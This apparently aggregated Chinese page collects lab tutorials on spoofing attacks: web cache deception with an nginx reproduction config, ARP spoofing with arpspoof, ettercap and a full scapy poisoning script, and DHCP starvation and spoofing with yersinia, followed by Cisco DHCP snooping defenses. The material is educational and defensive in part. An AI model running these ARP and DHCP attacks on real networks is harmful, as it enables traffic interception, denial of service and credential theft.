精华内容
下载资源
问答
  • 欺骗攻击
    千次阅读
    2021-12-09 13:36:32

    先来看一个例子,index.php需要登录后才可以看到个人信息,在a浏览器登录后然后访问http://192.168.81.210/web/csrf/source/cors/index.php/123.css切换到b浏览器,访问a浏览器的链接,可以发现不需要经过登录也可以看到个人信息。以上例子就是一个web缓存欺骗攻击

    漏洞介绍

    Web缓存欺骗(Web Cache Deception)是一种新的web攻击方法,包括web框架以及缓存机制等在内的许多技术都会受到这种攻击的影响。攻击者可以使用这种方法提取web用户的私人及敏感信息,在某些场景中,攻击者利用这种方法甚至可以完全接管用户账户。
    Web应用框架涉及许多技术,这些技术存在缺省配置或脆弱性配置,这也是Web缓存欺骗攻击能够奏效的原因所在。
    如果某个用户访问看上去人畜无害、实际上存在漏洞的一个URL,那么该Web应用所使用的缓存机制就会将用户访问的具体页面以及用户的私人信息存储在缓存中。

    背景介绍

    很多网站都会使用web缓存功能来减少web服务器的延迟,以便更快地响应用户的内容请求。为了避免重复处理用户的请求,web服务器引入了缓存机制,将经常被请求的文件缓存起来,减少响应延迟。通常被缓存的文件都是静态文件或者公共文件,如样式表(css)、脚本(js)、文本文件(txt)、图片(png、bmp、gif)等等。通常情况下,这些文件不会包含任何敏感信息。
    有多种方法能够实现缓存,比如,浏览器端也可以使用缓存机制:缓存文件后,一段时间内浏览器不会再次向web服务器请求已缓存的文件。这类缓存与web缓存欺骗攻击无关。实现缓存的另一种方法就是将一台服务器部署在客户端和web服务器之间,充当缓存服务器角色,这种实现方法会受到web缓存欺骗攻击影响。这类缓存有各种表现形式,包括:

    • CDN(Content Delivery Network,内容分发网络)。CDN是一种分布式代理网络,目的是快速响应内容请求。每个客户端都有一组代理服务器为其服务,缓存机制会选择离客户端最近的一个节点来提供服务。
    • 负载均衡(Load balancer)。负载均衡除了能够通过多台服务器平衡网络流量,也能缓存内容,以减少服务器的延迟。
    • 反向代理(Reverse proxy)。反向代理服务器会代替用户向web服务器请求资源,然后缓存某些数据。

    工作过程

    假设我们要访问的某个网站使用了服务器缓存技术,架构如下:
    举个例子,网站(Apache+PHP)配置了一个反向代理服务器(Nginx)作为web缓存。与其他网站类似,这个网站使用了公共文件,如图片、css文件以及脚本文件。这些文件都是静态文件,该网站的所有或绝大部分用户都会用到这些文件,对每个用户来说,此类文件返回的内容没有差别。这些文件没有包含任何用户信息,因此从任何角度来看,它们都不属于敏感文件。
    某个静态文件第一次被请求时,该请求会直接穿透代理服务器。缓存机制没见过这个文件,因此会向服务器请求这个文件,然后服务器会返回文件内容。现在,缓存机制需要识别所接收的文件的类型。不同缓存机制的处理流程有所不同,但在大多数情况下,代理服务器会根据URL的尾部信息提取文件的扩展名,然后再根据具体的缓存规则,决定是否缓存这个文件。
    如果文件被缓存,下一次任何客户端请求这个文件时,缓存机制不需要向服务器发起请求,会直接向客户端返回这个文件。

    利用条件

    1、缓存服务器根据后缀进行缓存
    2、访问xx.php/1.js等不存在的的静态文件,返回对应的xx.php的内容。
    3、受害者必须登录了网站

    利用流程

    当注册的用户成功登入了该网站,会跳转到自己的账户页面index.php,该Nginx反向代理服务器会将css、js、jpg等静态资源缓存到nginx设定的目录下。受害者不小心在浏览器中输入了如下的url:http://victim.com/index.php/123.css, 123.css 并不存在,此时会发什么神奇的事情呢?
    Nginx反向代理服务器发现url以静态文件的扩展名(.css)结尾,由于123.css 不存在,它的缓存机制会将 index.php 缓存到缓存目录中,这时攻击者访问了:http://victim.com/index.php/123.css,之前 缓存的帐户页面便成功返回给了攻击者。
    在这里插入图片描述

    最后贴一个phpstudy的nginx的配置,网上基本所有的文章都只是贴了文字,对于配置都是一笔带过,因为并不是很熟悉nginx的配置,只是勉强配置能复现,配置文件nginx.conf:首先在http模块下添加

    proxy_cache_path D:/Software/PHPStudy/PHPTutorial/nginx/cache levels=1:2 keys_zone=SLoan:500m inactive=10d max_size=10g;
    proxy_temp_path D:/Software/PHPStudy/PHPTutorial/nginx/cache/temp;
    

    然后在server模块下添加了两个location

      location ~ .*\.(gif|jpg|png|css|js)(.*) {
               proxy_pass         http://192.168.81.210:8070;#图中的源服务器地址
               proxy_cache SLoan;#keys_zone的值
               proxy_redirect default;
               proxy_ignore_headers Cache-Control Expires;
               proxy_set_header Host $host;
               #proxy_set_header X-Forwarded-For $remote_addr;
               proxy_cache_valid 200 304 5m;
               proxy_cache_valid any 1m;
               proxy_cache_key $host$uri$is_args$args;
               add_header Nginx-Cache "$upstream_cache_status";
               expires 10d;
               }
             location ~ \.php$ {
    			proxy_pass         http://192.168.81.210:8070;
    			}
    

    参考文章

    https://www.anquanke.com/post/id/86516

    更多相关内容
  • 为了防御欺骗攻击、保障传感器节点定位的有效性和可靠性,分析、总结了欺骗攻击所固有的薄弱环节,在此基础上,提出一种检测欺骗攻击的算法。检测节点通过核对与被检测节点之间信号传播时间和所损耗的功率是否相对应,来...
  • OSPF路由项欺骗攻击防御实验
  • 欺骗攻击及防御技术

    2018-06-25 15:17:00
    欺骗攻击及防御技术,欺骗攻击及防御技术,欺骗攻击及防御技术,欺骗攻击及防御技术,欺骗攻击及防御技术,
  • 从攻击者的角度研究多传感器系统的安全性问题, 该系统...此外,结合矩阵理论,分析受攻击前后系统性能指标的变化并给出可躲避chi^2检测器的最优线性欺骗攻击形式.最后,通过一个数值仿真例子验证所提出攻击策略的有效性.
  • 对手掌静脉识别的欺骗攻击 这个包提供了运行在论文发表的实验的源代码。 它依靠来执行 Palmvein 识别实验,并依靠一些卫星包来计算评估。 笔记 目前,该软件包仅适用于类 Unix 环境和 MacOS。 由于库的限制,不支持...
  • 为了防御欺骗攻击、保障传感器节点定位的有效性和可靠性,分析、总结了欺骗攻击所固有的薄弱环节,在此基础上提出一种检测欺骗攻击的算法。检测节点通过核对与被检测节点之间信号传播时间和所损耗的功率是否相对应,...
  • POX SDN控制器上的ARP欺骗缓解模块。 产品特点 防止LAN攻击者以很少的开销中毒节点的缓存表条目。 防止恶意数据包进入网络。 建立 ARPspoofperf.py使用检测模块创建测试设置。 ARPspoofperfwithoutsol.py创建没有...
  • 欺骗攻击的安全网络预测控制系统的设计与实现
  • #资源达人分享计划#
  • 由于ARP欺骗的木马程序发作的时候会发出大量的数据包导致局域网通讯拥塞以及其自身处理能力的限制,用户会感觉上网速度越来越慢。本文介绍了局域网受到ARP欺骗攻击时的解决方法。
  • IP欺骗技术就是伪造某台主机的IP 地址的技术。通过IP地址的伪装使得某台主机能够伪装另外的一台主机,而这台主机往往具有某种特权或者被另外的主机所信任,那么怎样利用思科IOS防止IP欺骗呢?
  • ARP欺骗攻击

    千次阅读 2022-03-15 21:55:30
    文章目录前景说明攻击机:Kail虚拟机靶机:Win11虚拟机必要条件ARP 欺骗攻击使用arpspoof使用ettercap使用python脚本攻击ARP欺骗的应用断网攻击数据获取 前景说明 攻击机:Kail虚拟机 网卡名称:eth0 IP地址:192....

    前景说明

    攻击机:Kail虚拟机

    • 网卡名称:eth0
    • IP地址:192.168.46.130 (局域网ip)
    • MAC地址:00:0C:29:2D:94:49
      在这里插入图片描述

    靶机:Win11虚拟机

    • 网卡名称:Ethernet0
    • IP地址:192.168.46.131 (局域网ip)
    • MAC地址:00:0C:29:30:DB:39
    • 网关地址:192.168.46.2
      在这里插入图片描述

    必要条件

    • 攻击机和靶机必须在同一局域网的同一网段下

    ARP 欺骗攻击

    使用arpspoof

    • 攻击命令: arpspoof -I 网卡 -t 目标主机IP 欲劫持的主机IP
    arpspoof -i eth0 -t 192.168.46.131 192.168.46.2
    
    • 攻击结果
      -
    • 查看靶机上的ARP缓存情况
    arp -a
    

    在这里插入图片描述

    • 用wireshark观察报文
      -
    • 停止欺骗
      在这里插入图片描述

    使用ettercap

    • 攻击命令:sudo ettercap -Tq -i 网卡 -M arp:remote /要欺骗的ip// /网关ip//
    参数解释:
    -T:以命令行方式启动ettercap;
    -q:安静模式,ettercap只输出重要信息
    -i:指定接入局域网进行中间人攻击的网卡;
    -M:指定ettercap进行中间人攻击。其格式为 -M <Method:Args>。对于上面的命令,Method对应arp,指定ettercap进行Arp欺骗;arp欺骗的参数--Args为remote,指定ettercap双向欺骗。如果只进行单向欺骗(即只欺骗Target1),相应的参数为: -M arp:oneway
    
    • 示例:
    ettercap -Tq -i eth0 -M arp:remote /192.168.46.131// /192.168.46.2//
    

    在这里插入图片描述

    • 攻击结果
      在这里插入图片描述
    • 结束攻击
      在这里插入图片描述

    使用python脚本攻击

    • 运行示例
    攻击:	./test.py 网卡 目标IP  被冒充的的主机IP  1 
    恢复:	./test.py 网卡 目标IP  被冒充的的主机IP  2
    
    • 脚本代码 test.py
    #!/usr/bin/python
    import sys
    # 导入第三方包路径
    sys.path.append('/usr/lib/python3/dist-packages')
    import time
    from scapy.all import sendp, ARP, Ether, getmacbyip, get_if_hwaddr
    
    def getInfo():
    	 # 判断脚本接受的参数是否足够
    	 if len(sys.argv) < 5:
    	 	 print(sys.argv[0] + ": <iface> <target> <spoof_ip> <option>")
    	 	 sys.exit(1)
    
    	 # 攻击机的网卡
    	 self_iface = sys.argv[1]
    	 # 通过攻击机的网卡获取攻击机的MAC地址
    	 self_mac = get_if_hwaddr(self_iface)
    	
    	 # 靶机的IP
    	 target_ip = sys.argv[2]
    	 # 通过靶机的IP获取靶机的MAC地址
    	 target_mac = getmacbyip(target_ip)
    	
    	 # 冒充的主机IP
    	 fake_ip = sys.argv[3]
    	 # 通过冒充的主机IP获取其MAC地址
    	 fake_mac = getmacbyip(fake_ip)
    
    	 # 执行选项      攻击或恢复
    	 option = sys.argv[4]
    
    	 return self_iface, self_mac, target_ip, target_mac, fake_ip, fake_mac, option
    
    def attack(self_iface, fake_ip, target_ip, target_mac, new_fake_mac):
    	 # 构造以太网报文头 Ether()层可以省略构造内容
    	 # dst:目标MAC地址,如果没有默认广播地址ff:ff:ff:ff:ff:ff
    	 # src: 源MAC地址,可以自己构造,默认是本机主网卡的Mac地址(标号最小的那个网卡)
        ethernet = Ether(dst=target_mac,src=new_fake_mac)
    
    	 # 构造ARP应答协议     告诉pdst: psrc的MAC地址是hwsrc 
    	 # op: ARP协议的操作类型,1表示ARP请求、2表示ARP应答、3表示RARP请求、4表示RARP应答,默认是1(who-has)
    	 # hwsrc: 源硬件地址,默认本机主网卡Mac地址
     	 # psrc: 源协议地址,默认本机主网卡IP地址
    	 # hwdst: 目标硬件地址
    	 # pdst: 目标协议地址
        arp = ARP(pdst=target_ip, psrc=fake_ip, hwsrc=new_fake_mac, op="is-at")
    
    	 # 构造应答包
        packet = ethernet / arp
    
    	 # 每10秒发一次构造应答包
        while True:
            sendp(packet, iface=self_iface)
            time.sleep(10)
    
    def recover(self_iface, fake_ip, fake_mac, target_ip, target_mac):
    	 # 构造以太网报文头 Ether()层可以省略构造内容
    	 # dst:目标MAC地址,如果没有默认广播地址ff:ff:ff:ff:ff:ff
    	 # src: 源MAC地址,可以自己构造,默认是本机主网卡的Mac地址(标号最小的那个网卡)
        ethernet = Ether(dst=target_mac,src=fake_mac)
    
    	 # 构造ARP应答协议     告诉pdst: psrc的MAC地址是hwsrc 
    	 # op: ARP协议的操作类型,1表示ARP请求、2表示ARP应答、3表示RARP请求、4表示RARP应答,默认是1(who-has)
    	 # hwsrc: 源硬件地址,默认本机主网卡Mac地址
     	 # psrc: 源协议地址,默认本机主网卡IP地址
    	 # hwdst: 目标硬件地址
    	 # pdst: 目标协议地址
        arp = ARP(pdst=target_ip, psrc=fake_ip, hwsrc=fake_mac, op="is-at")
    
    	 # 构造应答包
        packet = ethernet / arp
    
    	 # 每10秒发一次构造应答包, 发10次
        for i in range(10):
            sendp(packet, iface=self_iface)
            time.sleep(10)
    
    def main():
    	 self_iface, self_mac, target_ip, target_mac, fake_ip, fake_mac, option = getInfo()
    	 
    	 # 被冒充的主机MAC地址,可以构造虚假的MAC地址,也可以攻击机的MAC地址
    	 new_fake_mac = "b8:81:98:e0:46:6a"
    	 # new_fake_mac = self_mac	
    	 
    	 # 选择执行攻击还是恢复功能
    	 if(option == "1"):
    	 	 attack(self_iface, fake_ip, target_ip, target_mac, new_fake_mac)
    	 else:
    		 recover(self_iface, fake_ip, fake_mac, target_ip, target_mac)
    
    if __name__ == '__main__':
        main()
    
    
    • 必要说明
      使用攻击脚本时,如果使用攻击机自己的MAC地址进行欺骗,则不需要恢复靶机的arp缓存,靶机会自动恢复。但如果使用自己随机构造的MAC地址,则需要对靶机进行恢复。
    • 脚本攻击
    ./test.py eth0 192.168.46.131 192.168.46.2 1
    

    在这里插入图片描述

    • 脚本恢复
    ./test.py eth0 192.168.46.131 192.168.46.2 2
    

    在这里插入图片描述

    ARP欺骗的应用

    断网攻击

    • 上述ARP欺骗即可实现断网攻击。

    数据获取

    • 在攻击机上开启路由转发功能
    echo 1 > /proc/sys/net/ipv4/ip_forward     
    
    展开全文
  • 使用ARP协议对主机的欺骗攻击的设计与实现毕业论文.docx
  • 抵御欺骗攻击的TMT算法代码,基于三元组一致度滤除恶意参考信息。
  • 易语言ARP欺骗攻击

    2020-08-20 18:39:12
    易语言ARP欺骗攻击源码系统结构:随机MAC,获取MAC,探测停止,ARP欺骗,Ping探测,自定义ARP,API_SendARP,API_inet_addr, ======程序集1 || ||------_启动子程序 || || ======窗口程序集1 || ||------_DLL_局域网_创建
  • 多对联AF中继大规模MIMO网络中的安全传输,以抵抗主动飞行员的欺骗攻击
  • 基于代理模式防御DNS欺骗攻击,王虎,张华,DNS是目前互联网重要的基础部分,对它的攻击将会影响整个互联网的工作。DNS欺骗攻击时攻击者常用的方法,它具有隐蔽性强、打击面广
  • 例如很多企事业网管员经常收到员工抱怨无法访问互联网,经过故障排查后,发现客户端PC上缓存的网关ARP绑定条目是错误的,从此现象可以判断网络中可能出现ARP欺骗攻击,导致客户端PC不能获取正确的ARP条目,以致不能...
  • 为了改善静态绑定方法在抵御 ARP 攻击时存在的不易维护的问题,利用区块链技术思想,设计了一种防御成本低、后期易维护的 ARP 欺骗攻击防御方法。改进了区块链结构,设计了交易索引表结构,通过对比发现攻击并及时...
  • 服务器的ARP欺骗攻击的防范 这些天我的服务器几乎天天都被人ARP欺骗攻击,网页被挂木马,实在烦死了,深圳的龙岗电信机房实在是够恶心的,不得已,我只好寻找一些防范ARP攻击的方法,目前发现可以使用静态地址法和...
  • DHCP的工作原理 DHCP(动态主机配置协议)是一个局域网的网络协议。使用UDP协议工作,常用端口67(DHCP server服务端)68(DHCP client客户端),由服务器控制一段IP地址...2、攻击机搭建一个DHCP服务器 3、目标...
    1. DHCP的工作原理

    DHCP(动态主机配置协议)是一个局域网的网络协议。使用UDP协议工作,常用端口67(DHCP server服务端)68(DHCP client客户端),由服务器控制一段IP地址范围,客户机登录服务器时就可以自动获得服务器分配的IP地址和子网掩码。默认情况下,DHCP作为Windows Server的一个服务组件不会被系统自动安装,需要管理员手动安装并进行必要的配置。

         2 .DHCP欺骗的原理

    1、清空DHCP服务器地址池

    2、攻击机搭建一个DHCP服务器

    3、目标机获取IP失败

    4、目标机去向攻击机获取ip

    1. DHCP欺骗的实验,并使用嗅探工具嗅探FTP,telnet等登陆账号密码

    1、在WIN2003设置静态IP地址,搭建DHCP服务器

    2、kali下vi /etc/dhcp/dhcpd.conf,设置IP地址及DNS(以便后续目标及连接外网)

    3、目标机下释放连接后,kali命令yersinia -G,占用完地址池

    4、目标机重新建立连接,目标机网关与服务器同时处在攻击机IP下。

    更改前

    更改后

    嗅探

    输入命令ettercap -Tq -i eth0

    展开全文
  • 一、DHCP欺骗泛洪攻击 (1)钓鱼网站简介: (2)DNS的作用: (3)DHCP中继技术简介: (3-1)核心交换机DHCP配置命令: (4)dhcp欺骗详解: 第一步:pc2作为恶意攻击者会耗尽DHCP Sever的地址池,让DHCP ...

    目录

    一、DHCP欺骗泛洪攻击

    (1)钓鱼网站简介:

    (2)DNS的作用:

    (3)DHCP中继技术简介:

    (3-1)核心交换机DHCP配置命令:

    (4)dhcp欺骗详解:

    第一步:pc2作为恶意攻击者会耗尽DHCP Sever的地址池,让DHCP Server不能给pc1分配地址池

    第二步:pc2充当DNS和DHCP 欺骗pc1

    图解:

     二、如何防御及DHCP snooping配置命令

    (一)开启DHCP SNOOPING之后的效果:

    (二)、配置命令

    配置:

    观察PC2无法重新获取IP地址,原因是:

    发现打上trust命令,PC2任然无法获取IP地址,为什么?

    解决方案:

    针对DHCP报文进行限速:每秒这个接口可以发送DHCP报文10个

    手工定义扩展的CAM表:

    基于源MAC和源IP地址的过滤


    一、DHCP欺骗泛洪攻击

    (1)钓鱼网站简介:

    钓鱼网站是指欺骗用户的虚假网站。“钓鱼网站”的页面与真实网站界面基本一致,欺骗消费者或者窃取访问者提交的账号和密码信息。钓鱼网站一般只有一个或几个页面,和真实网站差别细微 [1]  。钓鱼网站是互联网中最常碰到的一种诈骗方式,通常伪装成银行及电子商务、窃取用户提交的银行账号、密码等私密信息的网站。

    (2)DNS的作用:

    把域名翻译为IP, 客户机向DNS服务器发送域名查询请求;DNS服务器告知客户机web服务器的IP地址,客户机与web服务器通信

    (3)DHCP中继技术简介:

    一般情况下,DHCP Server和DCHP Client都必须处于同一个网络中,这是因为DHCP的报文有些是以广播的形式发送,如果不位于同一个网络,则这些广播的报文就无法跨越三层路由设备传输。
    而在有些情况下,DHCP服务必须跨越不同的网络,这时,我们就可以配置DHCP中继服务。
    DHCP中继,其实就是在与DHCP Server不同而又需要申请DHCP服务的网络内,设置一个中继器,中继器在该网络中代替DHCP Server服务器接收DHCP Client的请求,并将DHCP Client发给DHCP Server的DCHP报文,以单播的形式发送给DHCP Server。DHCP Server在收到由DHCP发送来的DHCP 报文后,同样会把响应的DHCP报文发送给DHCP 中继。这样,DHCP其实是充当了一个中间人的作用,起到了在不同的网络中运行DHCP的目的。

    (3-1)核心交换机DHCP配置命令:

    interface Vlan 20
     ip address 192.168.20.254 255.255.255.0
     ip helper-address 192.168.10.1//将广播包变成单播单播包发给DHCP server
    exit

    (4)dhcp欺骗详解:

    正常情况下:PC1通过DHCP Server获取到IP、网关、DNS,当PC1访问www.123.com的时候会首先会把域名202.99.96.68朝着DNS发送,然后DNS查询公网IP地址,把公网IP地址发给pc1,然后pc1会朝着100.1.1.1发起页面请求,正常访问Web服务器。

     黑客恶意行为目的:当PC1访问外网正常的服务器时,使其访问这个钓鱼网站窃取他人信息。

    第一步:pc2作为恶意攻击者会耗尽DHCP Sever的地址池,让DHCP Server不能给pc1分配地址池

    首先,DHCP Server 是根据不同的mac地址分配IP地址,基于这一特性,pc2作为恶意攻击者,会创建一个discover报文:

     discover报文到达核心交换机以后,经过核心交换机的中继路由,提交给DHCP Server服务器,然后服务器根据这个网关地址从自己众多地址池里,找到对应网段的地址池,给pc2分配IP地址。

    每个mac分配一个ip,然而核心交换机关心的是处于discover报文里的mac地址。所以恶意攻击者可以伪造大量的discover报文在极短的时间内耗尽地址池(随机产生discover报文中的mac地址)

    第二步:pc2充当DNS和DHCP 欺骗pc1

    当全部耗尽以后,pc2可以充当DHCP和DNS(一般是在Linux系统里开启)

    所以当pc1再次发送discover报文的话,pc2肯定可以收到,所以现在由pc2给pc1分配

     IP:192.168.20.1    网关:192.168.20.4    DNS:192.168.20.4     ,此时pc1发送的,上网流量、DNS请求都发给了pc2(pc2作为DNS会做一个映射:www.123.com对应公网IP地址为200.1.1.1)

    所以当pc1访问www.123.com的时候会把域名发给pc2 做一个域名解析,而pc2做出的域名解析结果为200.1.1.1,200.1.1.1对应的是钓鱼网站,所以你在访问www.123.com时,实际访问的是钓鱼网站(你在钓鱼网站上输入的所有用户名、密码......黑客都可以窃取到)

    注:当大量产生BPDU报文时,就造成了泛洪攻击

    图解:

     二、如何防御及DHCP snooping配置命令

    (一)开启DHCP SNOOPING之后的效果:

    1、所有接口默认为untrust非信任状态,无法接受来自DHCP server的offea报文和ACK报文,除非把此接口置为trust信任接口

    2、检查二层数据帧源MAC地址和discover里面的PC MAC地址是否匹配,如果不匹配则丢弃(但是如果黑客可以设计算法使这两个同步变化,则还可以在接口启用端口安全技术)

    3、可以在接口下针对DHCP报文进行限速,防御黑客利用DHCP报文进行广播泛洪攻击

    4、检查从PC收到的DHCP报文,如果PC发送的DHCP报文含有option 82(主要体现pc连接到那台交换机的哪个接口下)的话(违规行为)则丢弃此报文,因为只有交换机采用权限在DHCP报文里面插入option 82选项(交换机还会在discover报文里面插入对应VLAN的gateway ip地址)

    5、检查是否有PC替代其他PC恶意退租IP地址(pc2发送恶意退租指令给DHCP server,让server回收pc1IP地址,所以当DHCP server给其他pc分配IP地址的时候,分配的是pc1的IP,则会形成IP地址冲突,导致不能上网),以及检查从这个接口收到的DHCP报文是否合乎DHCP的报文规矩

    6、产生一张扩展的CAM地址表,用以其他的高级安全应用;这个IP分配给了那个MAC,这个MAC连接在我的那个接口,这个接口属于那个VLAN,这个IP地址的租期多少时间

    (IP----MAC---接口---VLAN----租期)

    (二)、配置命令

    配置:

    3560全局配置:

    3560(config)#ip dhcp snooping  //全局开启

    3560(config)#ipdhcp snooping vlan 100 //VLAN100启用

    3550配置:

    3550(config)#ipdhcp snooping  //全局开启

    3550(config)#ipdhcp snooping vlan 100 //VLAN100启用

    观察PC2无法重新获取IP地址,原因是:

    两台交换启用了DHCP  snooping功能,默认启用此功能的交换机所有接口会拒绝接受来自DHCP serve的报文,需要把连接DHCP server的F0/2接口置为trust状态,可以接受offea和ACK报文

    sw-3550(config)#int f0/2

    sw-3550(config-if)#ip dhcp snooping trust

    sw-3550(config-if)#exit

    发现打上trust命令,PC2任然无法获取IP地址,为什么?

    PC2发出discover报文,在经过3550的时候被插入了option 82选项,带有option82选项的报文传给3560的时候被拒绝接受

    解决方案:

    1、3550不插入option 82选项

    sw-3550(config)#no ip dhcp snooping information option

    2、3560允许option82选项从untruste接口进来

    3560(config)#ip dhcp snooping information option allow-untrusted

    针对DHCP报文进行限速:每秒这个接口可以发送DHCP报文10

    sw-3550(config)#int f0/6

    sw-3550(config-if)#ipdhcp snooping limit rate 10

    sw-3550(config-if)#exit

    手工定义扩展的CAM表:

    Ip source binding  mac地址  VLAN ID  IP地址 接口

    基于源MAC和源IP地址的过滤

    Ip  dhcp  snooping

    Ip  dhcp  snooping vlan 10

    ip source binding 0001.0001.0001 vlan10 192.168.1.101 interface Fa0/7

    Int f0/7

    Switchport port-security(启用端口安全)

    Ip verity source port-secuity

    Exit

    对从F0/7接口进入的报文,根据源IP地址和源MAC地址进行认证审查,是否满足扩展的CAM

    以上仅个人观点,如有错误,还请指出!欢迎留言讨论!感谢! 

    展开全文
  • ARP欺骗攻击实验

    2022-04-21 16:39:29
    ARP攻击的原理:主机收到ARP回应之后会立刻将源MAC地址进行学习,并且更新ARP缓存表,可以根据这一漏洞对目标进行攻击: 首先搭建环境拓补,并配置主机地址: 如图已经配置完毕 服务器启动正常 在kali中对两个...
  • 例如很多企事业网管员经常收到员工抱怨无法访问互联网,经过故障排查后,发现客户端PC上缓存的网关ARP绑定条目是错误的,从此现象可以判断网络中可能出现ARP欺骗攻击,导致客户端PC不能获取正确的ARP条目,以致不能...
  • 切换拦截switch-intercept是一种便利脚本,可自动进行系统设置和拆卸,以通过ARP欺骗+ mitmproxy对路由器或交换机后面的本地主机执行中间人攻击。目的与您在同一台交换机上针对目标的常见攻击媒介是使用ARP缓存中毒...
  • ARP欺骗攻击.rar

    2020-04-04 10:18:00
    ARP欺骗攻击.rar

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 51,548
精华内容 20,619
关键字:

欺骗攻击

友情链接: vbsource.rar